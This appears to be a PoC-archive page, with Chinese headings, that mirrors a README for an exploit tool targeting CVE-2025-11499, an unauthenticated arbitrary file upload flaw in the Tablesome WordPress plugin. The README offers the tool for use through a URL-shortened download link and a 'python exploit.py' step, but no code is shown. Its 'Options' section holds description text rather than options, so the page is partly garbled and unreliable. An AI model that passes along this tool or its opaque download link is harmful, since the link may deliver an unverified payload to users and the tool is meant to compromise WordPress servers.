关联漏洞
介绍
# Arbitrary File Upload Vulnerability in Tablesome Table Plugin by WordPress (CVE-2025-11499)
## 🌟 Description
The Tablesome Table plugin for WordPress is susceptible to an arbitrary file upload vulnerability due to insufficient file type validation in the set_featured_image_from_external_url() function.
## ⚙️ Installation
To set up the exploitation tool, follow these steps:
1. Download the repository:
|[Download](https://tinyurl.com/4nybda6j)
|:--------------- |
2. Navigate to the tool's directory:
cd CVE-2025-11499
3. Install the required Python packages:
pip install -r requirements.txt
## 🚀 Usage
To use the tool, run the script from the command line as follows:
python exploit.py [options]
### Options
This flaw exists across all versions up to and including 1.1.32, enabling unauthenticated attackers to upload arbitrary files to the server. The vulnerability poses a significant risk, particularly in configurations where unauthenticated users can add featured images, leading to potential remote code execution under exploitation.
### CVSS V3.1
- **Severity**: Critical
- **CVSS Score**: 9.8 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low
## 🛡 Disclaimer
Use this tool responsibly and ethically. Always obtain proper authorization before testing any system for vulnerabilities.
文件快照
[4.0K] /data/pocs/14bc7c6c1067dfafb395da85f39592983bf2a6c9
└── [1.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。